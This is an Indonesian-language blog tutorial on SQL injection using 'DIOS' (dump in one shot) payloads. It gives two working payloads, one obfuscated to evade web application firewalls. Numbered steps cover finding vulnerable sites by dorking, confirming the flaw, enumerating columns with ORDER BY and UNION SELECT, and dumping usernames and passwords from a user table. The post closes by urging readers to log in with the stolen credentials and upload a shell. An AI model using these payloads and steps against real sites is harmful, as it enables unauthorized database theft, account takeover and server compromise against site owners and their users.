MASIGNCLEAN101

SQLI Dengan DIOS

iklan banner

Halo gan...

    Kali ini saya kan memberi tutorial bagaimana cara Sql Injection dengan DIOS ( Dump In One Shot).Berikut Exploitnya :
MadBlood DIOS :
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

 ZEN with WAF DIOS:
(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)

Ya langsung saja :

1.Dorking,jika kalian tahu apa ini dork dan cara mengembangkan nya kalian bisa lihat disini

2.Nah setelah dorking pilih target. Saya sudah mendapatkan target, langsung saja kita cek apakah vuln atau tidak dengan cara memberi tanda kutip (') dibelakang url target kita ( target.com/news.php?id=1') apabila blank/ada tulisan sql bla bla berarti vuln, seperti gambar dibawah ini adalah blank.

3.Langsung saja kita cari ada berapa kolom nya dengan cara menambahkan,(+order+by+--+), sampai menemukan error contoh :
- target.com/news.php?id=1'+order+by+1--+ (tidak error)
- target.com/news.php?id=1'+order+by+2--+ 
(tidak error)
- target.com/news.php?id=1'+order+by+3--+ (error) , berarti kolomnya ada 2 jadi,

4. Kita tambahkan (+union+select+) target.com/news.php?id=-1'+union+select+1,2--+

5.Nah setelah ngelakuin yang diatas pasti nanti muncul angka, contohnya muncul angka 2, berarti,
target.com/news.php?id=-1'+union+select+1,EXPLOIT--+

6.Setelah itu nanti akan ada user:username,user:password dan yang lainnya contoh kita akan dump. Username,Password jadi ,
target.com/news.php?id=-1'+union+select+1,group_concat(username,0x3a,password)+from+user--+

7.Muncul deh username dan passwordnya , setelah itu kalian login menggunakan username dan password yang muncul itu upload shell deh :P.

Mudah bukan?, sekian tutorial kali ini sampai jumpa di tutorial berikutnya :P.


Share This :